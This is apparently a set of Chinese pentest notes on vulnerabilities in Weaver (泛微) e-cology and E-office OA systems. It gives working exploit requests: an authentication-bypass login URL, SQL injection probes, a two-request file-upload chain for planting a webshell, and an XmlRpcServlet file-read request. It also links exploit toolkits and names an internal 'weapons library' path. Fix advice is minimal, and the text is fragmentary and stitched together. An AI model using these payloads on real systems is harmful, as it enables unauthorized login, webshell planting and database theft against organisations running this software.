0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
ofsLogin任意用户登录
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞:泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞编号:无
漏洞类型:认证绕过
影响版本:部分 e-cology9 并且补丁版本 < 10.57
/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1×tamp
修复建议:
目前,官方已发布修复建议,建议受影响的用户尽快升级至最新版本的补丁。
https://www.weaver.com.cn/cs/securityDownload.asp#
CheckServer.jsp 路径SQL注入
泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
漏洞编号:QVD-2023-9849
漏洞类型:SQL注入
影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56
POC:
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: ***
Connection: close
访问/mobile/plugin/CheckServer.jsp?type=mobileSetting ,返回状态码200且参数值为{“error”;”system error”}
修复建议:
目前官方已发布安全补丁,建议受影响用户尽快升级至10.57及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#
数据库配置信息泄露
http://t.zoukankan.com/BOHB-yunying-p-11759511.html
远程代码执行漏洞
https://blog.csdn.net/zy15667076526/article/details/111136664
9_V10.42_uploaderOperate_fileupload
漏洞等级:High
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 1822
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="secId"
1
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="Filedata"; filename="c.jsp"
<马儿>
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="plandetailid"
1
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
漏洞详情:/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞
通过以上数据包,修改自己需要的马儿,然后发送数据包之后可以看到文件的
fileid值,拿到这个fileid值之后
再使用OfficeServer移动实现未授权任意
文件上传getshell,这个漏洞需要发送两个数据包,数据包2如下所示:
POST /OfficeServer HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="aaa"
{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"115946"}
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
说明:“imagefileid4pic”:“115946” 此处的115946值为uploaderOperate接口获取到的fileid。然后访问url+马儿名称即可。
参考文章:
https://gitee.com/huge1376/2022-HW-POC/blob/main/%E6%B3%9B%E5%BE%AEOA%20uploaderOperate.jsp%20%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md
https://mp.weixin.qq.com/s/nzFOV6TKsmDnctSR4On5HQ
officeserverservlet_fileupload
漏洞等级:High
漏洞详情:/officeserverservlet 路径文件上传
将文件释放至跟网站根路径下 在数据包中将 fileid 替换
POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK—
V8_sqli
V9 @2022/7/26
文件上传漏洞 3
SQL注入漏洞 CNVD-2022-43843@2022/7/1
https://blog.csdn.net/skystephens/article/details/126041826
泛微-ifNewsCheckOutByCurrentUser-布尔盲注
泛微-LoginSSO-延时注入
漏洞汇总(12.11-12.17).xlsx
泛微 E-office 文件包含漏洞(CNVD-2022-43247)
泛微 E-office SQL 注入漏洞(CNVD-2022-43246)
泛微Office 10 SQL注入漏洞 2021/8/13
泛微 E-office SQL 注入漏洞 (CNVD-2022-43246) 2022/6/8
泛微 E-office 文件包含漏洞 (CNVD-2022-43247)
泛微OA存在命令执行漏洞(CNVD-2022-06870) 2022/2/13
泛微OA存在SQL注入漏洞(CNVD-2022-43843) 2022/6/30
泛微OA E-Cology 数据库配置信息泄漏
泛微OA V8 前台 SQL注入获取管理员 sysadmin MD5的密码值
泛微 OA WorkflowServiceXml RCE
泛微OA weaver.common.Ctrl 任意文件上传
泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
泛微 V9 文件上传漏洞
泛微 Ecology
泛微OA E-Cology 数据库配置信息泄漏 title="泛微"
泛微e-cology9 sql注入 CNVD-2023-12632
泛微e-cology9 SQL注入漏洞复现 QVD-2023-5012
泛微 OA e-cology 前台SQL注入漏洞
泛微E-Cology ReceiveCCRequestByXml XXE漏洞
泛微E-Cology FileDownloadForOutDoc SQL注入漏洞 QVD-2023-15672
"Ecology 9.x 补丁版本 < 10.58.0 Ecology 8.x 补丁版本 < 10.58.0"
泛微云桥e-Bridge任意文件读取
CNVD-2022-44187
CNVD-2022-43247
CNVD-2022-43246
泛微OA9前台 OA 9 - Arbitrary File Upload uploadOperation.jsp
泛微 E-Office mobile_upload_save 任意文件上传漏洞 CVE-2023-2523
app="泛微-EOffice"
泛微 E-Office 9.5 国内
weaver/oa-v9-uploads-file.yaml
e_office_mobile_upload.yaml
CNVD-2023-12632
泛微e-cology9 sql注入 附poc
泛微e-cology V9 < 10.56
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。[1](https://blog.csdn.net/Trouble_99/article/details/129639082)
[1](https://blog.csdn.net/Trouble_99/article/details/129639082)
QVD-2023-5012
泛微e-cology9 SQL注入漏洞复现
泛微e-cology9 <= 10.55
[泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。](https://blog.csdn.net/qq_41904294/article/details/129677395)[2](https://blog.csdn.net/qq_41904294/article/details/129677395)
[2](https://blog.csdn.net/qq_41904294/article/details/129677395)
CNVD-2022-44187<br>CNVD-2022-43247<br>CNVD-2022-43246
泛微云桥e-Bridge存在SQL注⼊漏洞
v4.0<br>v9.0 141103<br>v9.5 20220113
[泛微云桥多个版本存在多处SQL注⼊漏洞,攻击者可利⽤漏洞获取数据库敏感信息。](https://www.cnblogs.com/forforever/p/16525156.html)[3](https://www.cnblogs.com/forforever/p/16525156.html)
[3](https://www.cnblogs.com/forforever/p/16525156.html)
- [泛微OA_V9全版本的SQL远程代码执行漏洞](https://github.com/Wrin9/weaverOA_sql_RCE)[1](https://github.com/Wrin9/weaverOA_sql_RCE),该漏洞属于泛微OA msssql远程代码执行漏洞,可以通过pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --verify进行验证,该脚本使用python编写。
- 泛微e-cology9 sql注入[2](https://blog.csdn.net/Trouble_99/article/details/129639082),该漏洞由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据,该文章附有批量检测脚本,使用python编写。
- [泛微OA漏洞综合利用脚本](https://github.com/z1un/weaver_exp)
该项目收集了多个泛微OA的漏洞利用脚本,包括任意文件读取、任意文件上传、RCE、SQL注入等,均使用python编写。
存在SQL注入漏洞(CNVD-2022-43843) 2022/6/30
命令执行漏洞(CNVD-2022-06870) 2022/2/13
https://github.com/z1un/weaver_exp
E:\hack\道普内部武器库\未分类\漏洞利用载荷\OA系列漏洞测试\泛微\weaver_exp-master\poc
泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
泛微云桥e-Bridge任意文件读取
泛微OA E-Cology 数据库配置信息泄漏
泛微OA V8 前台 SQL注入获取管理员 sysadmin MD5的密码值
泛微 OA WorkflowServiceXml RCE
泛微E-cology OA系统的WorkflowServiceXml存在漏洞,攻击者可构造特定的xml数据包,造成命令执行
https://mp.weixin.qq.com/s?search_click_id=16835075092745781788-1693221956645-4879688491&__biz=MzU5MTE4Mzk0NQ==&mid=2247483801&idx=1&sn=1dc33687644498c64cdbb03241beb9f4&chksm=fe33a8bfc94421a919fa8457df49b45c4955768d988b90291520082006b8bb0c5bb3b45cb78f&key=f7b832e3047cb2c2febbbf9a0c9445cd369f6aa83455c7aeea69734521a0511041241af93c6dce3463fe39469d0f70ed5425a489588444878aa935629dc870e7c053620550e735cceedec0e3c93f712c9a426e75e24fc97f66ea9027cda1c2cb87c6eee01578ca577bac3027ca0e5af918d78a25c6b0a0a251e94cb093d4f131&ascene=0&uin=MTk0ODc4NzQwNQ%3D%3D&devicetype=Windows+10+x64&version=63090621&lang=zh_CN&countrycode=AG&exportkey=n_ChQIAhIQ07EBRBj0v3lnD6Bi7Tl9sBLgAQIE97dBBAEAAAAAAKt2BTPQfBMAAAAOpnltbLcz9gKNyK89dVj0LoJVaMSJhB3boJoZEm%2FRK028uGmFk3VEhXWeIGP1gRC8Ro%2BpWHIVqbg2rcExF9Jmkl8FrPnaba9eQSl16wQnJVOOh0c5c%2B3phScq6J%2FFW4v6RFiab%2BwY72VcIhpwBYLiXyVMjjNQjPSXTXx%2B20a5hJ2EWrIJLPOCq7qN8uTfq8LXVo82QLu0%2Fd9fhoSIjhAgrAcTdBzYSHqDUBDebz%2FQ9BzQcBERGy%2BsN9KCk6pmeAet%2FAmAs06eVVkE&acctmode=0&pass_ticket=7pJ46fH7DR8UjYl6tHMNhqKhxHgtrdsmBZDHOXz4hgTNSVEksKB6MHKT4XbMV5bN&wx_header=1
泛微OA weaver.common.Ctrl 任意文件上传
https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA
泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241s
V9_文件上传@2022/7/26
V9_代码执⾏
weaver.file.FileDownloadForOutDoc
xmlrpcServlet接口任意文件读取漏洞
# 泛微OA
https://mp.weixin.qq.com/s/BKmS_G3zugqaqjkZFtqLzg
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: testBanCookie=test; JSESSIONID=abcWZlxfDe-0l8aKD0AYy
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
扫一扫
435
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
